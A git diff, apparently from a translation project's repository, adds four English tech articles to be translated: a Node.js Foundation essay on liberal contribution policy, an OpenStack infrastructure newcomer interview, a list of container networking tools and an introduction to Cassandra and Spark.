+[13]: http://elementopie.com/geekrant-episodes
+[14]: http://monsterjavaguns.com/podcast
+[15]: http://www.tested.com/still-untitled-the-adam-savage-project/
diff --git a/sources/tech/20160314 Healthy Open Source.md b/sources/tech/20160314 Healthy Open Source.md
new file mode 100644
index 0000000000..57dd559284
--- /dev/null
+++ b/sources/tech/20160314 Healthy Open Source.md
@@ -0,0 +1,213 @@
+Translating by yuba0604
+Healthy Open Source
+============================
+
+keyword: Node.js , opensource , project management , software
+
+*A walkthrough of the Node.js Foundation’s base contribution policy*.
+
+A lot has changed since io.js and Node.js merged under the Node.js Foundation. The most impressive change, and probably the change that is most relevant to the rest of the community and to open source in general, is the growth in contributors and committers to the project.
+
+A few years ago, Node.js had just a few committers (contributors with write access to the repository in order to merge code and triage bugs). The maintenance overhead for the few committers on Node.js Core was overwhelming and the project began to see a decline in both committers and outside contribution. This resulted in a corresponding decline in releases.
+
+Today, the Node.js project is divided into many components with a full org size of well over 400 members. Node.js Core now has over 50 committers and over 100 contributors per month.
+
+Through this growth we’ve found many tools that help scale the human infrastructure around an Open Source project. We also identified a few core values we believe are fundamental to modern Open Source: transparency, participation, and efficacy. As we continue to scale the way we do Open Source we try to find a balance of these values and adapt the practices we find help to fit the needs of each component of the Node.js project.
+
+Now that Node.js is in a good place, the foundation is looking to promote this kind of sustainability in the ecosystem. Part of this is a new umbrella for additional projects to enter the foundation, of which [Express was recently admitted][1], and the creation of this new contribution policy.
+
+This contribution policy is not universal. It’s meant as a starting point. Additions and alterations to this policy are encouraged so that the process used by each project fits its needs and can continue to change shape as the project grows and faces new challenges.
+
+The [current version][2] is hosted in the Node.js Foundation. We expect to iterate on this over time and encourage people to [log issues][3] with questions and feedback regarding the policy for future iterations.
+
+This document describes a very simple process suitable for most projects in the Node.js ecosystem. Projects are encouraged to adopt this whether they are hosted in the Node.js Foundation or not.
+
+The Node.js project is organized into over a hundred repositories and a few dozen Working Groups. There are large variations in contribution policy between many of these components because each one has different constraints. This document is a minimalist version of the processes and philosophy we’ve found works best everywhere.
+
+We believe that contributors should own their projects, and that includes contribution policies like this. While new foundation projects start with this policy we expect many of them to alter it or possibly diverge from it entirely to suite their own specific needs.
+
+The goal of this document is to create a contribution process that:
+
+* Encourages new contributions.
+
+* Encourages contributors to remain involved.
+
+* Avoids unnecessary processes and bureaucracy whenever possible.
+
+* Creates a transparent decision making process which makes it clear how contributors can be involved in decision making.
+
+Most contribution processes are created by maintainers who feel overwhelmed by outside contributions. These documents have traditionally been about processes that make life easier for a small group of maintainers, often at the cost of attracting new contributors.
+
+We’ve gone the opposite direction. The purpose of this policy is to gain contributors, to retain them as much as possible, and to use a much larger and growing contributor base to manage the corresponding influx of contributions.
+
+As projects mature, there’s a tendency to become top heavy and overly hierarchical as a means of quality control and this is enforced through process. We use process to add transparency that encourages participation which grows the code review pool which leads to better quality control.
+
+This document is based on much prior art in the Node.js community, io.js, and the Node.js project.
+
+This document is based on what we’ve learned growing the Node.js project. Not just the core project, which has been a massive undertaking, but also much smaller sub-projects like the website which have very different needs and, as a result, very different processes.
+
+When we began these reforms in the Node.js project, we were taking a lot of inspiration from the broader Node.js ecosystem. In particular, Rod Vagg’s [OPEN Open Source policy][4]. Rod’s work in levelup and nan is the basis for what we now call “liberal contribution policies.”
+
+### Vocabulary
+
+* A **Contributor** is any individual creating or commenting on an issue or pull request.
+
+* A **Committer** is a subset of contributors who have been given write access to the repository.
+
+* A **TC (Technical Committee)** is a group of committers representing the required technical expertise to resolve rare disputes.
+
+Every person who shows up to comment on an issue or submit code is a member of a project’s community. Just being able to see them means that they have crossed the line from being a user to being a contributor.
+
+Typically open source projects have had a single distinction for those that have write access to the repository and those empowered with decision making. We’ve found this to be inadequate and have separated this into two distinctions which we’ll dive into more a bit later.
+
+![](https://www.linux.com/images/stories/66866/healthy_1.png)
+
+healthy 1Looking at the community in and around a project as a bunch of concentric circles helps to visualize this.
+
+In the outermost circle are users, a subset of those users are contributors, a subset of contributors become committers who can merge code and triage issues. Finally, a smaller group of trusted experts who only get pulled in to the hard problems and can act as a tie-breaker in disputes.
+
+This is what a healthy project should look like. As the demands on the project from increased users rise, so do the contributors, and as contributors increase more are converted into committers. As the committer base grows, more of them rise to the level of expertise where they should be involved in higher level decision making.
+
+![](https://www.linux.com/images/stories/66866/healthy-2.png)
+
+If these groups don’t grow in proportion to each other they can’t carry the load imposed on them by outward growth. A project’s ability to convert people from each of these groups is the only way it can stay healthy if its user base is growing.
+
+This is what unhealthy projects look like in their earliest stages of dysfunction, but imagine that the committers bubble is so small you can’t actually read the word “committers” in it, and imagine this is a logarithmic scale.
+
+healthy-2A massive user base is pushing a lot of contributions onto a very small number of maintainers.
+
+This is when maintainers build processes and barriers to new contributions as a means to manage the workload. Often the problems the project is facing will be attributed to the tools the project is using, especially GitHub.
+
+In Node.js we had all the same problems, resolved them without a change in tooling, and today manage a growing workload much larger than most projects, and GitHub has not been a bottleneck.
+
+We know what happens to unhealthy projects over a long enough time period, more maintainers leave, contributions eventually fall, and **if we’re lucky** users leave it. When we aren’t so lucky adoption continues and years later we’re plagued with security and stability issues in widely adopt software that can’t be effectively maintained.
+
+The number of users a project has is a poor indicator of the health of the project, often it is the most used software that suffers the biggest contribution crisis.
+
+### Logging
+
+Log an issue for any question or problem you might have. When in doubt, log an issue, any additional policies about what to include will be provided in the responses. The only exception is security disclosures which should be sent privately.
+
+The first sentence is surprisingly controversial. A lot of maintainers complain that there isn’t a more heavy handed way of forcing people to read a document before they log an issue on GitHub. We have documents all over projects in the Node.js Foundation about writing good bug reports but, first and foremost, we encourage people to log something and try to avoid putting barriers in the way of that.
+
+Sure, we get bad bugs, but we have a ton of contributors who can immediately work with people who log them to educate them on better practices and treat it as an opportunity to educate. This is why we have documentation on writing good bugs, in order to educate contributors, not as a barrier to entry.
+
+Creating barriers to entry just reduces the number of people there’s a chance to identify, educate and potentially grow into greater contributors.
+
+Of course, never log a public issue about a security disclosure, ever. This is a bit vague about the best private venue because we can’t determine that for every project that adopts this policy, but we’re working on a responsible disclosure mechanism for the broader community (stay tuned).
+
+Committers may direct you to another repository, ask for additional clarifications, and add appropriate metadata before the issue is addressed.
+
+For smaller projects this isn’t a big deal but in Node.js we’ve had to continually break off work into other, more specific, repositories just to keep the volume on a single repo manageable. But all anyone has to do when someone puts something in the wrong place is direct them to the right one.
+
+Another benefit of growing the committer base is that there’s more people to deal with little things, like redirecting issues to other repos, or adding metadata to issues and PRs. This allows developers who are more specialized to focus on just a narrow subset of work rather than triaging issues.
+
+Please be courteous, respectful, and every participant is expected to follow the project’s Code of Conduct.
+
+One thing that can burn out a project is when people show up with a lot of hostility and entitlement. Most of the time this sentiment comes from a feeling that their input isn’t valued. No matter what, a few people will show up who are used to more hostile environments and it’s good to have these kinds of expectations explicit and written down.
+
+And each project should have a Code of Conduct, which is an extension of these expectations that makes people feel safe and respected.
+
+### Contributions
+
+Any change to resources in this repository must be through pull requests. This applies to all changes to documentation, code, binary files, etc. Even long term committers and TC members must use pull requests.
+
+No pull request can be merged without being reviewed.
+
+Every change needs to be a pull request.
+
+A Pull Request captures the entire discussion and review of a change. Allowing some subset of committers to slip things in without a Pull Request gives the impression to potential contributors that they they can’t be involved in the project because they don’t have access to a behind the scenes process or culture.
+
+This isn’t just a good practice, it’s a necessity in order to be transparent enough to attract new contributors.
+
+For non-trivial contributions, pull requests should sit for at least 36 hours to ensure that contributors in other timezones have time to review. Consideration should also be given to weekends and other holiday periods to ensure active committers all have reasonable time to become involved in the discussion and review process if they wish.
+
+Part of being open and inviting to more contributors is making the process accessible to people in timezones all over the world. We don’t want to add an artificial delay in small doc changes but for any change that needs a bit of consideration needs to give people in different parts of the world time to consider it.
+
+In Node.js we actually have an even longer timeline than this, 48 hours on weekdays and 72 on weekends. That might be too much for smaller projects so it is shorter in this base policy but as a project grows it may want to increase this as well.
+
+The default for each contribution is that it is accepted once no committer has an objection. During review committers may also request that a specific contributor who is most versed in a particular area gives a “LGTM” before the PR can be merged. There is no additional “sign off” process for contributions to land. Once all issues brought by committers are addressed it can be landed by any committer.
+
+A key part of the liberal contribution policies we’ve been building is an inversion of the typical code review process. Rather than the default mode for a change to be rejected until enough people sign off, we make the default for every change to land. This puts the onus on reviewers to note exactly what adjustments need to be made in order for it to land.
+
+For new contributors it’s a big leap just to get that initial code up and sent. Viewing the code review process as a series of small adjustments and education, rather than a quality control hierarchy, does a lot to encourage and retain these new contributors.
+
+It’s important not to build processes that encourage a project to be too top heavy, with a few people needing to sign off on every change. Instead, we just mention any committer than we think should weigh in on a specific review. In Node.js we have people who are the experts on OpenSSL, any change to crypto is going to need a LGTM from them. This kind of expertise forms naturally as a project grows and this is a good way to work with it without burning people out.
+
+In the case of an objection being raised in a pull request by another committer, all involved committers should seek to arrive at a consensus by way of addressing concerns being expressed by discussion, compromise on the proposed change, or withdrawal of the proposed change.
+
+This is what we call a lazy consensus seeking process. Most review comments and adjustments are uncontroversial and the process should optimize for getting them in without unnecessary process. When there is disagreement, try to reach an easy consensus among the committers. More than 90% of the time this is simple, easy and obvious.
+
+If a contribution is controversial and committers cannot agree about how to get it to land or if it should land then it should be escalated to the TC. TC members should regularly discuss pending contributions in order to find a resolution. It is expected that only a small minority of issues be brought to the TC for resolution and that discussion and compromise among committers be the default resolution mechanism.
+
+For the minority of changes that are controversial and don’t reach an easy consensus we escalate that to the TC. These are rare but when they do happen it’s good to reach a resolution quickly rather than letting things fester. Contentious issues tend to get a lot of attention, especially by those more casually involved in the project or even entirely outside of it, but they account for a relatively small amount of what the project does every day.
+
+### Becoming a Committer
+
+All contributors who land a non-trivial contribution should be on-boarded in a timely manner, and added as a committer, and be given write access to the repository.
+
+This is where we diverge sharply from open source tradition.
+
+Projects have historically guarded commit rights to their version control system. This made a lot of sense when we were using version control systems like subversion. A single contributor can inadvertently mess up a project pretty badly in older version control systems, but not so much in git. In git, there isn’t a lot that can’t be fixed and so most of the quality controls we put on guarding access are no longer necessary.
+
+Not every committer has the rights to release or make high level decisions, so we can be much more liberal about giving out commit rights. That increases the committer base for code review and bug triage. As a wider range of expertise in the committer pool smaller changes are reviewed and adjusted without the intervention of the more technical contributors, who can spend their time on reviews only they can do.
+
+This is they key to scaling contribution growth: committer growth.
+
+Committers are expected to follow this policy and continue to send pull requests, go through proper review, and have other committers merge their pull requests.
+
+This part is entirely redundant, but on purpose. Just a reminder even once someone is a committer their changes still flow through the same process they followed before.
+
+### TC Process
+
+The TC uses a “consensus seeking” process for issues that are escalated to the TC. The group tries to find a resolution that has no open objections among TC members. If a consensus cannot be reached that has no objections then a majority wins vote is called. It is also expected that the majority of decisions made by the TC are via a consensus seeking process and that voting is only used as a last-resort.
+
+The best solution tends to be the one everyone can agree to so you would think that consensus systems would be the norm. However, **pure consensus** systems incentivize obstructionism which we need to avoid.
+
+In pure consensus everyone essentially has a veto. So, if I don’t want something to happen I’m in a strong position of power over everyone that wants something to happen. They have to convince me, and I don’t have to convince anyone else of anything.
+
+To avoid this we use a system called “consensus seeking” which has a long history outside of open source. It’s quite simple, just attempt to reach a consensus, if a consensus can’t be reached then call for a majority wins vote.
+
+Just the fact that a vote **is a possibility** means that people can’t be obstructionists, whether someone favor a change or not, they have to convince their peers and if they aren’t willing to put in the work to convince their peers then they probably don’t involve themselves in that decision at all.
+
+The way these incentives play out is pretty impressive. We started using this process in io.js and adopted it in Node.js when we merged into the foundation. In that entire time we’ve never actually had to call for a vote, just the fact that we could is enough to keep everyone working together to find a solution and move forward.
+
+Resolution may involve returning the issue to committers with suggestions on how to move forward towards a consensus. It is not expected that a meeting of the TC will resolve all issues on its agenda during that meeting and may prefer to continue the discussion happening among the committers.
+
+A TC tries to resolve things in a timely manner so that people can make progress but often it’s better to provide some additional guidance that pushes the greater contributorship towards resolution without being heavy handed.
+
+Avoid creating big decision hierarchies. Instead, invest in a broad, growing and empowered contributorship that can make progress without intervention. We need to view a constant need for intervention by a few people to make any and every tough decision as the biggest obstacle to healthy Open Source.
+
+Members can be added to the TC at any time. Any committer can nominate another committer to the TC and the TC uses its standard consensus seeking process to evaluate whether or not to add this new member. Members who do not participate consistently at the level of a majority of the other members are expected to resign.
+
+The TC just uses the same consensus seeking process for adding new members as it uses for everything else.
+
+It’s a good idea to encourage committers to nominate people to the TC and not just wait around for TC members to notice the impact some people are having. Listening to the broader committers about who they see as having a big impact keeps the TC’s perspective inline with the rest of the project.
+
+As a project grows it’s important to add people from a variety of skill sets. If people are doing a lot of docs work, or test work, treat the investment they are making as equally valuable as the hard technical stuff.
+
+Projects should have the same ladder, user -> contributor -> commiters -> TC member, for every skill set they want to build into the project to keep it healthy.
+
+I often see long time maintainers worry about adding people who don’t understand every part of the project, as if they have to be involved in every decision. The reality is that people do know their limitations and want to defer hard decisions to people they know have more experience.
+
+Thanks to Greg [Wallace][5] and ashley [williams][6].
+
+--------------------------------------------------------------------------------
+
+via: https://www.linux.com/news/biz-os/governance/892141-healthy-open-source
+
+作者:[Mikeal Rogers][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.linux.com/community/forums/person/66928
+
+
+[1]: https://medium.com/@nodejs/node-js-foundation-to-add-express-as-an-incubator-project-225fa3008f70#.mc30mvj4m
+[2]: https://github.com/nodejs/TSC/blob/master/BasePolicies/CONTRIBUTING.md
+[3]: https://github.com/nodejs/TSC/issues
+[4]: https://github.com/Level/community/blob/master/CONTRIBUTING.md
+[5]: https://medium.com/@gtewallaceLF
+[6]: https://medium.com/@ag_dubs
diff --git a/sources/tech/20160416 A newcomer's guide to navigating OpenStack Infrastructure.md b/sources/tech/20160416 A newcomer's guide to navigating OpenStack Infrastructure.md
new file mode 100644
index 0000000000..4fa50b0a45
--- /dev/null
+++ b/sources/tech/20160416 A newcomer's guide to navigating OpenStack Infrastructure.md
@@ -0,0 +1,87 @@
+A newcomer's guide to navigating OpenStack Infrastructure
+===========================================================
+
+New contributors to OpenStack are welcome, but having a road map for navigating within this maturing, fast-paced open source community doesn't hurt. At OpenStack Summit in Austin, [Paul Belanger][1] (Red Hat, Inc.), [Elizabeth K. Joseph][2] (HPE), and [Christopher Aedo][3] (IBM) will lead a session on [OpenStack Infrastructure for Beginners][4]. In this interview, they offer tips and resources to help onboard new OpenStack contributors.
+
+![](https://opensource.com/sites/default/files/images/life/Interview%20banner%20Q%26A.png)
+
+**Your talk description says you'll be "diving into the heart of infrastructure and explain everything you need to know about the systems that keep OpenStack working." That's a tall order for a 40-minute time slot. What are the top things beginners should know about OpenStack infrastructure?**
+
+**Elizabeth K. Joseph (EKJ)**: We don't use GitHub for OpenStack patches. This is something that trips up a lot of new contributors because we do maintain mirrors of all our repositories on GitHub for historical reasons. Instead we use a fully open source code review and continuous integration (CI) system maintained by the OpenStack Infrastructure team. Relatedly, since we run a CI system, every change proposed to OpenStack is tested before merging.
+
+**Paul Belanger (PB)**: A lot of passionate people in the project, so don't get discouraged if your patch gets a -1.
+
+**Christopher Aedo (CA)**: The community wants to help you succeed, don't be afraid to ask questions or ask for pointers to more information to improve your understanding.
+
+### Which online resources would you recommend for beginners to fill in the holes for what you can't cover in your talk?
+
+**PB**: Definitely our [OpenStack Project Infrastructure documentation][5]. At lot of effort has been taken to keep it up to date as much as possible. Every system used in running OpenStack as a project has a dedicated page, even the OpenStack cloud the Infrastructure teams is bringing online.
+
+**EKJ**: I'll echo what Paul said about the Infrastructure documentation, and add that we love seeing patches from folks who are learning. We often don't realize what we're missing in terms of documentation until someone asks. So read, learn, and then help us fill in the gaps. You can ask questions on the [openstack-infra mailing list][6] or in our IRC channel at #openstack-infra on Freenode.
+
+**CA**: I love [this detailed post][7] about building images, by Ian Wienand.
+
+### Which "gotchas" should new OpenStack contributors look out for?
+
+**EKJ**: Contributing is not just about submitting new code and new features; the OpenStack community places a very high value on doing code reviews. If you want people to look at a patch you submitted, consider reviewing some of the work of others and providing clear and constructive feedback. The more your fellow contributors know about your work and see you doing reviews, the more likely you'll get your code reviewed in a timely manner.
+
+**CA**: I see a lot of newcomers getting tripped up with [Gerrit][8]. Read through the [developer workflow][9] in the Developers Guide, and then maybe read through it one more time. If you're not used to Gerrit, it can seem confusing and overwhelming at first, but walking through a few code reviews usually makes it all come together. Also, I'm a big fan of IRC. It can be a great place to get help, but it's best if you can maintain a persistent presence so people can answer your questions even if you're not "there" at that particular moment. (Read [IRC, the secret to success in open source][10].) You don't need to be "always on," but the ability to easily scroll back in a channel and catch up on a conversation can be invaluable.
+
+**PB**: I agree with both Elizabeth and Chris—Gerrit is what to look out for. It is going to be the hub of your development effort. Not only will you be submitting code for people to review, but you'll also be reviewing other contributors' code. Watch out for the Gerrit UI; it can be confusing at times. I'd recommend trying out [Gertty][11], which is a console-based interface to the Gerrit Code Review system, which happens to be a project driven by OpenStack Infrastructure.
+
+### What resources do you recommend for beginners to help them network with other OpenStack contributors?
+
+**PB**: For me, it was using IRC and joining the #openstack-infra channel on Freenode ([IRC logs][12]). There is a lot of fantastic information and people in that channel. You get to see the day-to-day operations of the OpenStack project, and once you know how the project works, you'll have a better understanding on how to contribute to its future.
+
+**CA**: I want to second that note for IRC; staying on IRC throughout the day made a huge difference for me in terms of feeling informed and connected. It's also such a great way to get help when you're stuck with someone on one of the projects—the ones with active IRC channels always have someone around willing to get your issues sorted out.
+
+**EKJ**: The [openstack-dev mailing list][13] is quite important for staying up to date with news about projects you're working on inside of OpenStack, so I recommend subscribing to that. The mailing list uses subject tags to separate projects, so you can instruct your email client to use those and focus on threads that impact projects you care about. Beyond online resources, many OpenStack groups have popped up all over the world that serve the needs of both users and contributors to OpenStack, and many of them routinely have talks and events with key OpenStack contributors. You can search on Meetup.com in your area, or search on [groups.openstack.org][14] to see if there is an OpenStack group in your area. Finally, there are the [OpenStack Summits][15], which happen every six months, and where we'll be giving our Infrastructure talk. In their current format, the summits consist of both a user conference and a developer conference in one space to talk about everything related to OpenStack, past, present, and future.
+
+### In which areas does OpenStack need to improve to become more beginner-friendly?
+
+**PB**: I think our [account-setup][16] process could be made easier for new contributors, especially how many steps are needed to submit your first patch. There is a large cost to enroll into OpenStack development model, which maybe be too much for contributors; however, once enrolled, the model works fantastic for developers.
+
+**CA**: We have a very pro-developer community, but the focus is on developing OpenStack itself, with less consideration given to the users of OpenStack clouds. We need to bring in application developers and encourage more people to develop things that run beautifully on OpenStack clouds, and encourage them to share those apps in the [Community App Catalog][17]. We can do this by continuing to improve our API standards and by ensuring different libraries (like libcloud, phpopencloud, and others) continue to work reliably for developers. Oh, also by sponsoring more OpenStack hackathons! All these things can ease entry for newcomers, which will lead to them sticking around.
+
+**EKJ**: I've worked on open source software for many years, but for a large number of OpenStack developers, this is the first open source project they've every worked on. I've found that their proprietary software background doesn't prepare them for the open source ideals, methodologies, and collaboration techniques used in an open source project. I'd love to see us do a better job of welcoming people who have this proprietary software background and working with them so they can truly understand the value of what they're working on in the open source software community.
+
+### I think 2016 is shaping up to be the Year of the Open Source Haiku. Explain OpenStack to beginners via Haiku.
+
+**PB**: OpenStack runs clouds If you enjoy free software Submit your first patch
+
+**CA**: In the near future OpenStack will rule the world Help make it happen!
+
+**EKJ**: OpenStack is free Deploy on your own servers And run your own cloud!
+
+*Paul, Elizabeth*, and Christopher will be [speaking at OpenStack Summit][18] in Austin on Monday, April 25, starting at 11:15am.
+
+
+------------------------------------------------------------------------------
+
+via: https://opensource.com/business/16/4/interview-openstack-infrastructure-beginners
+
+作者:[linux.com][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: http://rikkiendsley.com/
+[1]: https://twitter.com/pabelanger
+[2]: https://twitter.com/pleia2
+[3]: https://twitter.com/docaedo
+[4]: https://www.openstack.org/summit/austin-2016/summit-schedule/events/7337
+[5]: http://docs.openstack.org/infra/system-config/
+[6]: http://lists.openstack.org/cgi-bin/mailman/listinfo/openstack-infra
+[7]: https://www.technovelty.org/openstack/image-building-in-openstack-ci.html
+[8]: https://code.google.com/p/gerrit/
+[9]: http://docs.openstack.org/infra/manual/developers.html#development-workflow
+[10]: https://developer.ibm.com/opentech/2015/12/20/irc-the-secret-to-success-in-open-source/
+[11]: https://pypi.python.org/pypi/gertty
+[12]: http://eavesdrop.openstack.org/irclogs/%23openstack-infra/
+[13]: http://lists.openstack.org/cgi-bin/mailman/listinfo/openstack-dev
+[14]: https://groups.openstack.org/
+[15]: https://www.openstack.org/summit/
+[16]: http://docs.openstack.org/infra/manual/developers.html#account-setup
+[17]: https://apps.openstack.org/
+[18]: https://www.openstack.org/summit/austin-2016/summit-schedule/events/7337
diff --git a/sources/tech/20160511 4 Container Networking Tools to Know.md b/sources/tech/20160511 4 Container Networking Tools to Know.md
new file mode 100644
index 0000000000..5b80791c6f
--- /dev/null
+++ b/sources/tech/20160511 4 Container Networking Tools to Know.md
@@ -0,0 +1,63 @@
+4 Container Networking Tools to Know
+=======================================
+
+![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/network-crop.jpeg?itok=Na1tb9aR)
+>[Creative Commons Zero][1]
+
+With so many new cloud computing technologies, tools, and techniques to keep track of, it can be hard to know where to start learning new skills. This series on [next-gen cloud technologies][2] aims to help you get up to speed on the important projects and products in emerging and rapidly changing areas such as software-defined networking (SDN) , containers, and the space where they coincide: container networking.
+
+The relationship between containers and networks remains challenging for enterprise container deployment. Containers need networking functionality to connect distributed applications. Part of the challenge, according to a recent [Enterprise Networking Planet][3] article, is “to deploy containers in a way that provides the isolation they need to function as their own self-contained data environments while still maintaining effective connectivity.”
+
+[Docker][4], the popular container platform, uses software-defined virtual networks to connect containers with the local network. Additionally, it uses Linux bridging features and virtual extensible LAN (VXLAN) technology so containers can communicate with each other in the same Swarm, or cluster. Docker’s plug-in architecture also allows other network management tools, such as those listed below, to control containers.
+
+Innovation in container networking has enabled containers to connect with other containers across hosts. This enables developers to start an application in a container on a host in a development environment and transition it across testing and then into a production environment enabling continuous integration, agility, and rapid deployment.
+
+Container networking tools help accomplish container networking scalability, mainly by:
+
+1) enabling complex, multi-host systems to be distributed across multiple container hosts.
+
+2) enabling orchestration for container systems spanning a tremendous number of hosts across multiple public and private cloud platforms.
+
+![](https://www.linux.com/sites/lcom/files/styles/floated_images/public/john-willis_k.jpg?itok=lTsH9eqI)
+>John Willis speaking at Open Networking Summit 2016.
+
+For more information, check out the [Docker Networking Tutorial][5] video, which was presented by Brent Salisbury and John Willis at the recent [Open Networking Summit (ONS)][6]. This and many other ONS keynotes and presentations can be found [here][7].
+
+Container networking tools and projects you should know about include:
+
+[Calico][8] -- The Calico project (from [Metaswitch][9]) leverages Border Gateway Protocol (BGP) and integrates with cloud orchestration systems for secure IP communication between virtual machines and containers.
+
+[Flannel][10] -- Flannel (previously called rudder) from [CoreOS][11] provides an overlay network that can be used as an alternative to existing SDN solutions.
+
+[Weaveworks][12] -- The Weaveworks projects for managing containers include [Weave Net][13], Weave Scope, and Weave Flux. Weave Net is a tool for building and deploying Docker container networks.
+
+[Canal][14] -- Just this week, CoreOS and Tigera announced the formation of a new open source project called Canal. According to the announcement, the Canal project aims to combine aspects of Calico and Flannel, "weaving security policy into both the network fabric and the cloud orchestrator."
+
+You can learn more about container management, software-defined networking, and other next-gen cloud technologies through The Linux Foundation’s free “Cloud Infrastructure Technologies” course -- a massively open online course being offered through edX. [Registration for this course is open now][15], and course content will be available in June.
+
+--------------------------------------------------------------------------------
+
+via: https://www.linux.com/news/4-container-networking-tools-know
+
+作者:[AMBER ANKERHOLZ][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://www.linux.com/users/aankerholz
+[1]: https://www.linux.com/licenses/category/creative-commons-zero
+[2]: https://www.linux.com/news/5-next-gen-cloud-technologies-you-should-know
+[3]: http://www.enterprisenetworkingplanet.com/datacenter/datacenter-blog/container-networking-challenges-for-the-enterprise.html
+[4]: https://docs.docker.com/engine/userguide/networking/dockernetworks/
+[5]: https://youtu.be/Le0bEg4taak
+[6]: http://events.linuxfoundation.org/events/open-networking-summit
+[7]: https://www.linux.com/watch-videos-from-ons2016
+[8]: https://www.projectcalico.org/
+[9]: http://www.metaswitch.com/cloud-network-virtualization
+[10]: https://coreos.com/blog/introducing-rudder/
+[11]: https://coreos.com/
+[12]: https://www.weave.works/
+[13]: https://www.weave.works/products/weave-net/
+[14]: https://github.com/tigera/canal
+[15]: https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-cloud-infrastructure-technologies?utm_source=linuxcom&utm_medium=article&utm_campaign=cloud%20mooc%20article%201
diff --git a/sources/tech/20160511 An introduction to data processing with Cassandra and Spark.md b/sources/tech/20160511 An introduction to data processing with Cassandra and Spark.md
new file mode 100644
index 0000000000..46331a9ae5
--- /dev/null
+++ b/sources/tech/20160511 An introduction to data processing with Cassandra and Spark.md
@@ -0,0 +1,51 @@
+Translating KevinSJ
+An introduction to data processing with Cassandra and Spark
+==============================================================
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/osdc_520x292_opendata_0613mm.png?itok=mzC0Tb28)
+
+
+There's been a huge surge of interest around the Apache Cassandra database due to the increasing uptime and performance demands of modern cloud applications.
+
+So, what is Apache Cassandra? A distributed OLTP database built for high availability and linear scalability. When people ask what Cassandra is used for, think about the type of system you want close to the customer. This is ultimately the system that our users interact with. Applications that must always be available: product catalogs, IoT, medical systems, and mobile applications. In these categories downtime can mean loss of revenue or even more dire outcomes depending on your specific use case. Netflix was one of the earliest adopters of this project, which was open sourced in 2008, and their contributions, along with successes, put it on the radar of the masses.
+
+Cassandra became a top level Apache Software Foundation project in 2010 and has been riding the wave in popularity since then. Now even knowledge in Cassandra gets you serious returns in the job market. It's both crazy and awesome to consider a NoSQL and open source technology could perform this sort of disruption next to the giants of enterprise SQL. This begs the question, what makes it so popular?
+
+Cassandra has the ability to be always on in spite of massive hardware and network failures by utilizing a design first widely discussed in [the Dynamo paper from Amazon][1]. By using a peer to peer model, with no single point of failure, we can survive rack failure and even complete network partitions. We can deal with an entire data center failure without impacting our customer's experience. A distributed system that plans for failure is a properly planned distributed system, because frankly, failures are just going to happen. With Cassandra, we accept that cruel fact of life, and bake it into the database's architecture and functionality.
+
+We know what you’re thinking, "But, I’m coming from a relational background, isn't this going to be a daunting transition?" The answer is somewhat yes and no. Data modeling with Cassandra will feel familiar to developers coming from the relational world. We use tables to model our data, and CQL, the Cassandra Query Language, to query the database. However, unlike SQL, Cassandra supports more complex data structures such as nested and user defined types. For instance, instead of creating a dedicated table to store likes on a cat photo, we can store that data in a collection with the photo itself enabling faster, sequential lookups. That's expressed very naturally in CQL. In our photo table we may want to track the name, URL, and the people that liked the photo.
+
+![](https://opensource.com/sites/default/files/resize/screen_shot_2016-05-06_at_7.17.33_am-350x198.png)
+
+In a high performance system milliseconds matter for both user experience and for customer retention. Expensive JOIN operations limit our ability to scale out by adding unpredictable network calls. By denormalizing our data so it can be fetched in as few requests as possible, we profit from the trend of decreasing costs in disk space and in return get predictable, high performance applications. We embrace the concept of denormalization with Cassandra because it offers a pretty appealing tradeoff.
+
+We're obviously not just limited to storing likes on cat photos. Cassandra is a optimized for high write throughput. This makes it the perfect solution for big data applications where we’re constantly ingesting data. Time series and IoT use cases are growing at a steady rate in both demand and appearance in the market, and we're continuously finding ways to utilize the data we collect to improve our technological application.
+
+This brings us to the next step, we've talked about storing our data in a modern, cost-effective fashion, but how do we get even more horsepower? Meaning, once we've collected all that data, what do we do with it? How can we analyze hundreds of terabytes efficiently? How can we react to information we're receiving in real-time, making decisions in seconds rather than hours? Enter Apache Spark.
+
+Spark is the next step in the evolution of big data processing. Hadoop and MapReduce were revolutionary projects, giving the big data world an opportunity to crunch all the data we've collected. Spark takes our big data analysis to the next level by drastically improving performance and massively decreasing code complexity. Through Spark, we can perform massive batch processing calculations, react quickly to stream processing, make smart decisions through machine learning, and understand complex, recursive relationships through graph traversals. It’s not just about offering your customers a fast and reliable connection to their application (which is what Cassandra offers), it's also about being able to leverage insights from the data Cassandra stores to make more intelligent business decisions and better cater to customer needs.
+
+You can check out the [Spark-Cassandra Connector][2] (open source) and give it a shot. To learn more about both technologies, we highly recommend the free self-paced courses on [DataStax Academy][3].
+
+Have fun digging in and learning some killer new technology! If you want to learn more, check out our [OSCON tutorial][4], with a hands on exploration into the worlds of both Cassandra and Spark.
+
+We also love taking questions on Twitter, so give us a shout and we’ll try to help: [Dani][5] and [Jon][6].
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/life/16/5/basics-cassandra-and-spark-data-processing
+
+作者:[Jon Haddad][a],[Dani Traphagen][b]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://twitter.com/rustyrazorblade
+[b]: https://opensource.com/users/dtrapezoid
+[1]: http://www.allthingsdistributed.com/files/amazon-dynamo-sosp2007.pdf
+[2]: https://github.com/datastax/spark-cassandra-connector
+[3]: https://academy.datastax.com/
+[4]: http://conferences.oreilly.com/oscon/open-source-us/public/schedule/detail/49162
+[5]: https://twitter.com/dtrapezoid
+[6]: https://twitter.com/rustyrazorblade
